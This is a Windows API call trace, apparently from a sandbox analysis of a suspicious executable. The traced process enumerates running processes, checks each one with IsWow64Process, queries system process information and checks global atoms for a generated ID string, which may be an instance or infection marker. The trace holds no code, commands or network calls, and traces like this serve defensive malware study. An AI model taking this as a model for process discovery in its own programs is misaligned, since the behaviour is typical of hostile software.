	[0143.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.779] CloseHandle (hObject=0x2dc) returned 1
	[0143.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.779] CloseHandle (hObject=0x2dc) returned 1
	[0143.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0143.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.779] CloseHandle (hObject=0x2dc) returned 1
	[0143.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0143.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.780] CloseHandle (hObject=0x2dc) returned 1
	[0143.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.780] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.781] GetLastError () returned 0x5
	[0143.782] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.782] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.782] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] GetLastError () returned 0x5
	[0143.782] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.783] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetLastError () returned 0x5
	[0143.784] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.784] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.785] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.785] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.785] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.785] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.785] CloseHandle (hObject=0x2dc) returned 1
	[0143.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.785] CloseHandle (hObject=0x2dc) returned 1
	[0143.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.786] CloseHandle (hObject=0x2dc) returned 1
	[0143.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.786] CloseHandle (hObject=0x2dc) returned 1
	[0143.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.787] CloseHandle (hObject=0x2dc) returned 1
	[0143.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0143.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.787] CloseHandle (hObject=0x2dc) returned 1
	[0143.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0143.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c38) returned 0xc0000004
	[0143.826] VirtualAlloc (lpAddress=0x0, dwSize=0x16d38, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0143.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d38, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0143.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0143.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0143.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.834] CloseHandle (hObject=0x2dc) returned 1
	[0143.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.835] CloseHandle (hObject=0x2dc) returned 1
	[0143.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0143.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.836] CloseHandle (hObject=0x2dc) returned 1
	[0143.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.836] CloseHandle (hObject=0x2dc) returned 1
	[0143.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.837] CloseHandle (hObject=0x2dc) returned 1
	[0143.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.837] CloseHandle (hObject=0x2dc) returned 1
	[0143.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.837] CloseHandle (hObject=0x2dc) returned 1
	[0143.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.838] CloseHandle (hObject=0x2dc) returned 1
	[0143.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.839] CloseHandle (hObject=0x2dc) returned 1
	[0143.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.839] CloseHandle (hObject=0x2dc) returned 1
	[0143.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.840] CloseHandle (hObject=0x2dc) returned 1
	[0143.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.840] CloseHandle (hObject=0x2dc) returned 1
	[0143.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.840] CloseHandle (hObject=0x2dc) returned 1
	[0143.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0143.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.841] CloseHandle (hObject=0x2dc) returned 1
	[0143.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0143.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.841] CloseHandle (hObject=0x2dc) returned 1
	[0143.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.842] CloseHandle (hObject=0x2dc) returned 1
	[0143.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.842] CloseHandle (hObject=0x2dc) returned 1
	[0143.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.843] CloseHandle (hObject=0x2dc) returned 1
